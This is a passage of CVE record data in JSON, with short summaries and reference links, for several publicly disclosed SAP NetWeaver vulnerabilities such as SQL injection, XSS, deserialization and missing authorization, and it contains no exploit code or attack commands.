"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7094",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"name": "https://service.sap.com/sap/support/notes/1836718",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1836718"
},
{
"name": "netweaver-rsddcvercounttabcols-sql-inject(89603)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89603"
},
{
"name": "56061",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/56061"
},
{
"name": "64232",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/64232"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7094",
"datePublished": "2013-12-13T19:00:00",
"dateReserved": "2013-12-13T00:00:00",
"dateUpdated": "2024-08-06T17:53:45.867Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6821
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1628537 | x_refsource_CONFIRM | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.929Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1628537"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-01-31T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1628537"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6821",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1628537",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1628537"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6821",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.929Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-9844
Vulnerability from cvelistv5
Published
2017-07-12 16:00
Modified
2024-08-05 17:18
Severity ?
EPSS score ?
Summary
SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/96865 | vdb-entry, x_refsource_BID | |
| https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T17:18:02.205Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "96865",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/96865"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-03-14T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "96865",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/96865"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-9844",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "96865",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/96865"
},
{
"name": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-9844",
"datePublished": "2017-07-12T16:00:00",
"dateReserved": "2017-06-24T00:00:00",
"dateUpdated": "2024-08-05T17:18:02.205Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-6252
Vulnerability from cvelistv5
Published
2014-09-05 14:00
Modified
2024-08-06 12:10
Severity ?
EPSS score ?
Summary
Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/2018221 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/ | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/96196 | vdb-entry, x_refsource_XF | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/60496 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T12:10:12.670Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/2018221"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"name": "netweaver-cve20146252-bo(96196)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96196"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "60496",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/60496"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-08-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/2018221"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"name": "netweaver-cve20146252-bo(96196)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96196"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "60496",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/60496"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-6252",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/2018221",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/2018221"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-011-sap-netweaver-dispatcher-buffer-overflow-rce-dos/"
},
{
"name": "netweaver-cve20146252-bo(96196)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96196"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "60496",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/60496"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-6252",
"datePublished": "2014-09-05T14:00:00",
"dateReserved": "2014-09-05T00:00:00",
"dateUpdated": "2024-08-06T12:10:12.670Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2009-2932
Vulnerability from cvelistv5
Published
2009-08-21 20:21
Modified
2024-08-07 06:07
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field.
References
| ▼ | URL | Tags |
|---|---|---|
| http://osvdb.org/57000 | vdb-entry, x_refsource_OSVDB | |
| http://www.dsecrg.com/pages/vul/show.php?id=133 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/52429 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/archive/1/505697/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securitytracker.com/id?1022731 | vdb-entry, x_refsource_SECTRACK | |
| https://service.sap.com/sap/support/notes/1322098 | x_refsource_MISC | |
| http://www.securityfocus.com/bid/36034 | vdb-entry, x_refsource_BID | |
| http://secunia.com/advisories/36228 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T06:07:37.331Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "57000",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/57000"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.dsecrg.com/pages/vul/show.php?id=133"
},
{
"name": "netweaver-uddi-xss(52429)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52429"
},
{
"name": "20090812 [DSECRG-09-033] SAP Netweaver UDDI - XSS Security Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/505697/100/0/threaded"
},
{
"name": "1022731",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1022731"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1322098"
},
{
"name": "36034",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/36034"
},
{
"name": "36228",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/36228"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2009-08-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "57000",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/57000"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.dsecrg.com/pages/vul/show.php?id=133"
},
{
"name": "netweaver-uddi-xss(52429)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52429"
},
{
"name": "20090812 [DSECRG-09-033] SAP Netweaver UDDI - XSS Security Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/505697/100/0/threaded"
},
{
"name": "1022731",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1022731"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1322098"
},
{
"name": "36034",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/36034"
},
{
"name": "36228",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/36228"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2009-2932",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "57000",
"refsource": "OSVDB",
"url": "http://osvdb.org/57000"
},
{
"name": "http://www.dsecrg.com/pages/vul/show.php?id=133",
"refsource": "MISC",
"url": "http://www.dsecrg.com/pages/vul/show.php?id=133"
},
{
"name": "netweaver-uddi-xss(52429)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52429"
},
{
"name": "20090812 [DSECRG-09-033] SAP Netweaver UDDI - XSS Security Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/505697/100/0/threaded"
},
{
"name": "1022731",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1022731"
},
{
"name": "https://service.sap.com/sap/support/notes/1322098",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1322098"
},
{
"name": "36034",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/36034"
},
{
"name": "36228",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/36228"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2009-2932",
"datePublished": "2009-08-21T20:21:00",
"dateReserved": "2009-08-21T00:00:00",
"dateUpdated": "2024-08-07T06:07:37.331Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-2387
Vulnerability from cvelistv5
Published
2016-02-16 15:00
Modified
2024-08-05 23:24
Severity ?
EPSS score ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2016/May/39 | mailing-list, x_refsource_FULLDISC | |
| https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/ | x_refsource_MISC | |
| https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:24:49.312Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html"
},
{
"name": "20160517 [ERPSCAN-16-008] SAP NetWeaver AS JAVA - XSS vulnerability in ProxyServer servlet",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/May/39"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-02-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html"
},
{
"name": "20160517 [ERPSCAN-16-008] SAP NetWeaver AS JAVA - XSS vulnerability in ProxyServer servlet",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/May/39"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-2387",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/137045/SAP-NetWeaver-AS-JAVA-7.4-Cross-Site-Scripting.html"
},
{
"name": "20160517 [ERPSCAN-16-008] SAP NetWeaver AS JAVA - XSS vulnerability in ProxyServer servlet",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/May/39"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"name": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-2387",
"datePublished": "2016-02-16T15:00:00",
"dateReserved": "2016-02-16T00:00:00",
"dateUpdated": "2024-08-05T23:24:49.312Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-21481
Vulnerability from cvelistv5
Published
2021-03-09 14:05
Modified
2024-08-03 18:16
Severity ?
EPSS score ?
Summary
The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/3022422 | x_refsource_MISC | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver AS JAVA (MigrationService) |
Version: < 7.10 Version: < 7.11 Version: < 7.30 Version: < 7.31 Version: < 7.40 Version: < 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T18:16:22.540Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3022422"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver AS JAVA (MigrationService)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.10"
},
{
"status": "affected",
"version": "\u003c 7.11"
},
{
"status": "affected",
"version": "\u003c 7.30"
},
{
"status": "affected",
"version": "\u003c 7.31"
},
{
"status": "affected",
"version": "\u003c 7.40"
},
{
"status": "affected",
"version": "\u003c 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Missing Authorization",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-03-09T14:05:51",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3022422"
},
{
